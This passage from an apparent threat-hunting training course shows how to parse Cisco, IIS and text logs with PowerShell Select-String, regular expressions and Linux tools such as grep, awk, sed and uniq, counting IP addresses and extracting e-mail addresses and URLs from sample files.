932The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
933------------------------Type This------------------------------
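# Same search, keeping only the matched text (the Line property).
Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line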
935---------------------------------------------------------------
936
937
938
939To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
940------------------------Type This------------------------------
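# Number of lines that mention the host.
Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line | Measure-Object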
942---------------------------------------------------------------
943
944
945To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.
946------------------------Type This------------------------------
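# Count of distinct dotted-quad tokens in the file. The regex accepts any
# 1-3 digit groups (e.g. 999.999.999.999), so it is a token match, not a
# strict IPv4 validator.
Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | Measure-Object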
948---------------------------------------------------------------
949
950
951Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.
952------------------------Type This------------------------------
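# The distinct dotted-quad tokens themselves, sorted.
Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique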
954---------------------------------------------------------------
955
In order to determine which IP addresses have the most communication, the last commands are removed to get the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and the objects are sorted by using the alias for Sort-Object: sort count -des.
957This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell.
958------------------------Type This------------------------------
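# Occurrences per address, most frequent first (group = Group-Object,
# sort = Sort-Object, -des = -Descending).
Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select value | group value | sort count -des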
960---------------------------------------------------------------
961
962
963
964##############################################
965# Parsing Log files using windows PowerShell #
966##############################################
967
968Download the sample IIS log http://pastebin.com/LBn64cyA
969
970------------------------Type This------------------------------
# Fetch the sample IIS log. This goes over plain HTTP, so the content is neither
# authenticated nor integrity-protected; treat it as untrusted sample data.
# NOTE(review): DownloadFile presumably needs c:\ps to exist already — confirm.
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")

# Reads every *log file in the current directory (not c:\ps), so run this from
# c:\ps or adjust the path; keeps only the lines that mention WebDAV.
Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV")}
974---------------------------------------------------------------
975
976
977The above command would give us all the WebDAV requests.
978
979To narrow this further, use the command below; the example additionally requires the string OPTIONS (substitute a user name to filter on a particular user):
980------------------------Type This------------------------------
# Keep only the log lines that contain both "WebDAV" and "OPTIONS".
Get-Content ".\*log" |
    Where-Object { ($_ | Select-String "WebDAV") -and ($_ | Select-String "OPTIONS") }
982---------------------------------------------------------------
983
984
985Some other filters that are commonly required:
986
987For Outlook Web Access : Replace WebDAV with OWA
988
989For EAS : Replace WebDAV with Microsoft-server-activesync
990
991For ECP : Replace WebDAV with ECP
992
993
994
995
996
997
998
999####################################################################
1000# Windows PowerShell: Extracting Strings Using Regular Expressions #
1001####################################################################
1002
1003
1004Regex Characters you might run into:
1005
1006^ Start of string, or start of line in a multiline pattern
1007$ End of string, or end of line in a multiline pattern
1008\b Word boundary
1009\d Digit
1010\ Escape the following character
1011*   0 or more        {3}   exactly 3
1012+   1 or more        {3,}  3 or more
1013?   0 or 1           {3,5} 3, 4 or 5
1014
1015
1016
1017To build a script that will extract data from a text file and place the extracted text into another file, we need three main elements:
1018
10191) The input file that will be parsed
1020------------------------Type This------------------------------
# Fetch the three sample input files used by the scripts below. All three go over
# plain HTTP, so they are neither authenticated nor integrity-protected; treat them
# as untrusted sample data and do not point these scripts at anything sensitive
# without checking what was actually downloaded.
# NOTE(review): DownloadFile presumably needs c:\ps to exist already — confirm.
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=rDN3CMLc", "c:\ps\emails.txt")
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=XySD8Mi2", "c:\ps\ip_addresses.txt")
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=v5Yq66sH", "c:\ps\URL_addresses.txt")
1024---------------------------------------------------------------
10252) The regular expression that the input file will be compared against
1026
10273) The output file for where the extracted data will be placed.
1028
1029Windows PowerShell has a "select-string" cmdlet which can be used to quickly scan a file to see if a certain string value exists.
1030Using some of the parameters of this cmdlet, we are able to search through a file to see whether any strings match a certain pattern, and then output the results to a separate file.
1031
1032To demonstrate this concept, below is a Windows PowerShell script I created to search through a text file for strings that match the Regular Expression (or RegEx for short) pattern belonging to e-mail addresses.
1033------------------------Type This------------------------------
# Scan emails.txt for anything shaped like an e-mail address and write every
# match, one per line, to extracted_addresses.txt.
$input_path  = 'c:\ps\emails.txt'
$output_file = 'c:\ps\extracted_addresses.txt'
$regex       = '\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b'
Select-String -Path $input_path -Pattern $regex -AllMatches |
    ForEach-Object { $_.Matches } |
    ForEach-Object { $_.Value } > $output_file
1038---------------------------------------------------------------
1039
1040
1041In this script, we have the following variables:
1042
10431) $input_path to hold the path to the input file we want to parse
1044
10452) $output_file to hold the path to the file we want the results to be stored in
1046
10473) $regex to hold the regular expression pattern to be used when the strings are being matched.
1048
1049The select-string cmdlet contains various parameters as follows:
1050
10511) "-Path" which takes as input the full path to the input file
1052
10532) "-Pattern" which takes as input the regular expression used in the matching process
1054
10553) "-AllMatches" which finds every match on a line (without this parameter it would stop after the first match); its output is piped to "$_.Matches" and then "$_.Value", which yield the matched strings themselves.
1056
1057Using ">" the results are written to the destination specified in the $output_file variable.
1058
1059Here are two further examples of this script which incorporate a regular expression for extracting IP addresses and URLs.
1060
1061IP addresses
1062------------
1063For the purposes of this example, I ran the tracert command to trace the route from my host to google.com and saved the results into a file called ip_addresses.txt. You may choose to use this script for extracting IP addresses from router logs, firewall logs, debug logs, etc. Note that the pattern only checks for four dot-separated groups of one to three digits, so it will also match values that are not valid addresses (for example 300.1.1.1).
1064------------------------Type This------------------------------
# Scan ip_addresses.txt for dotted-quad strings and write every match, one per
# line, to extracted_ip_addresses.txt. The pattern is shape-only (four groups of
# 1-3 digits), so values above 255 in any octet are matched too.
$input_path  = 'c:\ps\ip_addresses.txt'
$output_file = 'c:\ps\extracted_ip_addresses.txt'
$regex       = '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
Select-String -Path $input_path -Pattern $regex -AllMatches |
    ForEach-Object { $_.Matches } |
    ForEach-Object { $_.Value } > $output_file
1069---------------------------------------------------------------
1070
1071
1072
1073URLs
1074----
1075For the purposes of this example, I created a couple of dummy web server log entries and saved them into URL_addresses.txt.
1076You may choose to use this script for extracting URL addresses from proxy logs, network packet capture logs, debug logs, etc.
1077------------------------Type This------------------------------
# Scan URL_addresses.txt for scheme://host[/path] strings and write every match,
# one per line, to extracted_URL_addresses.txt.
$input_path  = 'c:\ps\URL_addresses.txt'
$output_file = 'c:\ps\extracted_URL_addresses.txt'
$regex       = '([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
Select-String -Path $input_path -Pattern $regex -AllMatches |
    ForEach-Object { $_.Matches } |
    ForEach-Object { $_.Value } > $output_file
1082---------------------------------------------------------------
1083
1084In addition to the examples above, many other types of strings can be extracted using this script.
1085All you need to do is switch the regular expression in the "$regex" variable!
1086In fact, the beauty of such a PowerShell script is its simplicity and speed of execution.
1087
1088
1089
1090 ######################################
1091----------- ############### # Day 5: Wrapping up threat hunting ################ -----------
1092 #####################################
1093
1094##############################################
1095# Log Analysis with Linux command-line tools #
1096##############################################
1097The following command-line executables are found on macOS as well as in most Linux distributions.
1098
1099cat – prints the content of a file in the terminal window
1100grep – searches and filters based on patterns
1101awk – can sort each row into fields and display only what is needed
1102sed – performs find and replace functions
1103sort – arranges output in an order
1104uniq – compares adjacent lines and can report, filter or provide a count of duplicates
1105
1106
1107##############
1108# Cisco Logs #
1109##############
1110
1111-----------------------------Type this-----------------------------------------
# Sample Cisco syslog used throughout this section (fetched over HTTPS).
wget https://s3.amazonaws.com/infosecaddictsfiles/cisco.log
1113-------------------------------------------------------------------------------
1114
1115AWK Basics
1116----------
1117To quickly demonstrate awk's print feature, we can instruct it to show only the 5th field of each line by printing $5. Only the last 4 lines are shown for brevity.
1118
1119-----------------------------Type this-----------------------------------------
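# Print the 5th whitespace-separated field of each line. awk reads the file
# directly (the extra cat process is not needed); tail keeps the last 4 lines.
awk '{print $5}' cisco.log | tail -n 4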
1121-------------------------------------------------------------------------------
1122
1123
1124
1125Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in "$5", group them together, count them, then sort them from the greatest to the least number of occurrences. This can be done by piping the output through "sort", using "uniq -c" to count the like entries, then using "sort -rn" to sort it in reverse numeric order.
1126
1127-----------------------------Type this-----------------------------------------
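# Tally every distinct value of field 5: sort so duplicates are adjacent,
# count them with uniq -c, then order by count, largest first (-rn).
# awk reads the file directly; the extra cat process is not needed.
awk '{print $5}' cisco.log | sort | uniq -c | sort -rn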
1129-------------------------------------------------------------------------------
1130
1131
1132
1133While that's sort of cool, it is obvious that we have some garbage in our output. Evidently a few lines don't conform to the format we expect to see in $5. We can insert grep to filter the file before feeding it to awk. This ensures that we are at least looking at lines of text that contain a "facility-level-mnemonic".
1134
1135-----------------------------Type this-----------------------------------------
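# Keep only lines carrying a %FACILITY-LEVEL-MNEMONIC token before tallying
# field 5. The pattern is quoted: left unquoted, "[a-zA-Z]*" is also a shell
# glob and could be expanded against filenames in the current directory,
# silently changing what grep searches for. grep reads the file directly.
grep '%[a-zA-Z]*-[0-9]-[a-zA-Z]*' cisco.log | awk '{print $5}' | sort | uniq -c | sort -rn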
1137-------------------------------------------------------------------------------
1138
1139
1140
1141
1142Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
1143
1144-----------------------------Type this-----------------------------------------
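# Show every line-protocol state-change message. grep reads the file directly
# and the pattern is quoted so the shell never interprets it.
grep '%LINEPROTO-5-UPDOWN:' cisco.log

# Tally field 10 (presumably the interface name — check against the raw lines);
# any trailing comma is still attached at this point, so counts may split.
grep '%LINEPROTO-5-UPDOWN:' cisco.log | awk '{print $10}' | sort | uniq -c | sort -rn

# Strip commas first so the field-10 values group cleanly.
grep '%LINEPROTO-5-UPDOWN:' cisco.log | sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn

# Pair field 10 with its new state in field 14 and count each pairing.
grep '%LINEPROTO-5-UPDOWN:' cisco.log | sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn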
1152--------------------------------------------------------------------------------